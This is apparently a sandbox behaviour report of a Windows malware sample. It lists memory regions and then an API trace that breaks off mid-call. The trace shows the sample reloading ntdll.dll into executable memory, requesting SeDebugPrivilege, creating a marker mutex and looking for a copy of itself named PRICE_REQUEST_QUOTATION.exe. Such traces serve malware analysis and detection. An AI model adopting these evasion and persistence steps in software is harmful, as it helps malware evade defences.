"" Region: id = 3035 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3036 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3037 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3038 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3039 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3040 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3041 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3042 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3043 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3044 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3045 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3046 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3047 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3048 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3049 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3050 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3051 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3052 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3053 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3054 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3055 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3056 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3057 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3058 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3059 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3060 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3061 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3062 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3063 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3064 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3065 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3066 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3067 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3068 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3069 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3070 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3071 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3072 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3073 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3074 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3075 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3076 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3077 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3078 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3079 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3080 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3081 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3082 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3083 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3084 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3085 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3086 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3087 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3088 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3089 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3090 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3091 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3092 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3093 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3112 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3113 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3114 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3115 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3116 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3117 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3118 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3119 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3120 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3121 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3122 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3123 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3124 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3125 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3126 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3127 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3128 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3129 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3130 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3131 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3132 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3133 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3134 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3135 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3136 start_va = 0x1020000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 3137 start_va = 0x1020000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Thread: id = 54 os_tid = 0x154 [0119.711] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0xdf29c | out: HeapArray=0xdf29c*=0x670000) returned 0x2 [0119.729] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0xdf24c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0119.732] NtCreateFile (in: FileHandle=0xdf26c, DesiredAccess=0x120089, ObjectAttributes=0xdf234*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdf254, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdf26c*=0x160, IoStatusBlock=0xdf254*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0119.745] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x676548) returned 1 [0119.750] NtQueryInformationFile (in: FileHandle=0x160, IoStatusBlock=0xdf254, FileInformation=0xdf1ac, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdf254, FileInformation=0xdf1ac) returned 0x0 [0119.758] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1788a0) returned 0xc10020 [0119.793] NtReadFile (in: FileHandle=0x160, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0xdf254, Buffer=0xc10020, BufferLength=0x1784a0, ByteOffset=0xdf1c4*=0, Key=0x0 | out: IoStatusBlock=0xdf254, Buffer=0xc10020*) returned 0x0 [0119.798] NtClose (Handle=0x160) returned 0x0 [0119.798] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x17b001) returned 0xd9b020 [0119.824] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0xc10020) returned 1 [0119.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdf240*=0x0, ZeroBits=0x0, RegionSize=0xdf244*=0x2f9522, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0xdf240*=0x64b0000, RegionSize=0xdf244*=0x2fa000) returned 0x0 [0119.893] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1000) returned 0x681548 [0119.893] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1000) returned 0x682550 [0119.894] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1000) returned 0x683558 [0119.894] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x2000) returned 0x684560 [0119.894] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x683558) returned 1 [0119.894] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x3000) returned 0x686568 [0119.895] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x684560) returned 1 [0119.899] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x4000) returned 0x689570 [0119.899] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x686568) returned 1 [0119.900] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x5000) returned 0x683558 [0119.900] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x689570) returned 1 [0119.900] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1000) returned 0x688560 [0119.900] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x2000) returned 0x689568 [0119.900] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x688560) returned 1 [0119.900] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x3000) returned 0x68b570 [0119.900] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x689568) returned 1 [0119.900] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x4000) returned 0x68e578 [0119.900] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x68b570) returned 1 [0119.901] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x5000) returned 0x688560 [0119.901] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x68e578) returned 1 [0119.901] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1000) returned 0x68d568 [0119.901] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x2000) returned 0x68e570 [0119.901] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x68d568) returned 1 [0119.901] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x3000) returned 0x690578 [0119.901] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x68e570) returned 1 [0119.901] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x4000) returned 0x693580 [0119.901] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x690578) returned 1 [0119.902] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x5000) returned 0x68d568 [0119.902] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x693580) returned 1 [0119.902] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x681548) returned 1 [0119.902] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x682550) returned 1 [0119.902] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x683558) returned 1 [0119.903] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x688560) returned 1 [0119.903] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x68d568) returned 1 [0119.951] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1000) returned 0x681548 [0119.951] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1000) returned 0x682550 [0119.951] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1000) returned 0x683558 [0119.952] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x2000) returned 0x684560 [0119.952] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x683558) returned 1 [0119.952] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x3000) returned 0x686568 [0119.952] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x684560) returned 1 [0119.952] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x4000) returned 0x689570 [0119.952] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x686568) returned 1 [0119.953] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x5000) returned 0x683558 [0119.954] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x689570) returned 1 [0119.954] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1000) returned 0x688560 [0119.955] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x2000) returned 0x689568 [0119.955] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x688560) returned 1 [0119.955] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x3000) returned 0x68b570 [0119.955] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x689568) returned 1 [0119.955] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x4000) returned 0x68e578 [0119.955] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x68b570) returned 1 [0119.955] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x5000) returned 0x688560 [0119.955] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x68e578) returned 1 [0119.955] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1000) returned 0x68d568 [0119.956] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x2000) returned 0x68e570 [0119.956] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x68d568) returned 1 [0119.956] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x3000) returned 0x690578 [0119.956] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x68e570) returned 1 [0119.956] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x4000) returned 0x693580 [0119.956] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x690578) returned 1 [0119.956] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x5000) returned 0x68d568 [0119.956] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x693580) returned 1 [0119.957] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x681548) returned 1 [0119.957] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x682550) returned 1 [0119.957] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x683558) returned 1 [0119.957] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x688560) returned 1 [0119.958] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x68d568) returned 1 [0119.961] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0xdf1ec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0119.961] NtCreateFile (in: FileHandle=0xdf20c, DesiredAccess=0x120089, ObjectAttributes=0xdf1d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdf1f4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdf20c*=0x160, IoStatusBlock=0xdf1f4*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0119.961] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x676548) returned 1 [0119.961] NtQueryInformationFile (in: FileHandle=0x160, IoStatusBlock=0xdf1f4, FileInformation=0xdef68, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0xdf1f4, FileInformation=0xdef68) returned 0x0 [0119.961] NtClose (Handle=0x160) returned 0x0 [0119.961] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x208) returned 0x681548 [0119.962] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x681548) returned 1 [0119.968] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x62fb11d0, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0xdf228, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0xdf228*(BaseAddress=0x62fb1000, AllocationBase=0x62fb0000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x20, Type=0x1000000), ResultLength=0x0) returned 0x0 [0120.538] NtQuerySystemInformation (in: SystemInformationClass=0x23, SystemInformation=0xdf280, Length=0x2, ResultLength=0x0 | out: SystemInformation=0xdf280, ResultLength=0x0) returned 0x0 [0120.570] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0xdf2a4, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdf2a4, ReturnLength=0x0) returned 0x0 [0120.597] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0xd9b020) returned 1 [0120.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdef34*=0x0, ZeroBits=0x0, RegionSize=0xdef38*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdef34*=0x550000, RegionSize=0xdef38*=0x10000) returned 0x0 [0120.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0120.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf294*=0x550000, RegionSize=0xdef58, FreeType=0x8000) returned 0x0 [0120.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdef20*=0x0, ZeroBits=0x0, RegionSize=0xdef24*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdef20*=0x770000, RegionSize=0xdef24*=0x20000) returned 0x0 [0120.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x770000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x770000, ResultLength=0x0) returned 0x0 [0120.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf294*=0x770000, RegionSize=0xdf298, FreeType=0x8000) returned 0x0 [0120.662] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xdf050 | out: Value="RDhJ0CNFevzX") returned 0x0 [0120.667] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xdf2ac | out: TokenHandle=0xdf2ac*=0x160) returned 0x0 [0120.671] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xdf2a0 | out: lpLuid=0xdf2a0*(LowPart=0x14, HighPart=0)) returned 1 [0120.677] NtAdjustPrivilegesToken (in: TokenHandle=0x160, DisableAllPrivileges=0, NewState=0xdf29c, BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 0x106 [0120.680] NtClose (Handle=0x160) returned 0x0 [0120.680] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xdebe0 | out: Value="RDhJ0CNFevzX") returned 0x0 [0120.680] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="14-ARU9T", Value=0xdf08c | out: Value=0xdf08c) returned 0xc0000100 [0120.680] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xde9c0 | out: Value="RDhJ0CNFevzX") returned 0x0 [0120.683] NtOpenDirectoryObject (in: FileHandle=0xdee80, DesiredAccess=0x2000f, ObjectAttributes=0xdee4c*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0xdee80*=0x160) returned 0x0 [0120.685] NtCreateMutant (in: MutantHandle=0xdf0ac, DesiredAccess=0x1f0001, ObjectAttributes=0xdee34*(Length=0x18, RootDirectory=0x160, ObjectName="14-ARU9TUYI8wI3z", Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0xdf0ac*=0x180) returned 0x0 [0120.686] NtClose (Handle=0x160) returned 0x0 [0120.691] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1000) returned 0x682c78 [0120.691] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1000) returned 0x683c80 [0120.692] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1000) returned 0x684c88 [0120.692] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0xdecec | out: Value="C:\\Program Files (x86)") returned 0x0 [0120.692] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xdece8 | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0121.321] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Desktop\\PRICE_REQUEST_QUOTATION.exe", NtPathName=0xdec94, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Desktop\\PRICE_REQUEST_QUOTATION.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.323] NtCreateFile (in: FileHandle=0xdecb4, DesiredAccess=0x120089, ObjectAttributes=0xdec7c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Desktop\\PRICE_REQUEST_QUOTATION.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdec9c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdecb4*=0x0, IoStatusBlock=0xdec9c*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0121.324] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x679688) returned 1 [0121.324] RtlDosPathNameToNtPathName_U (in: 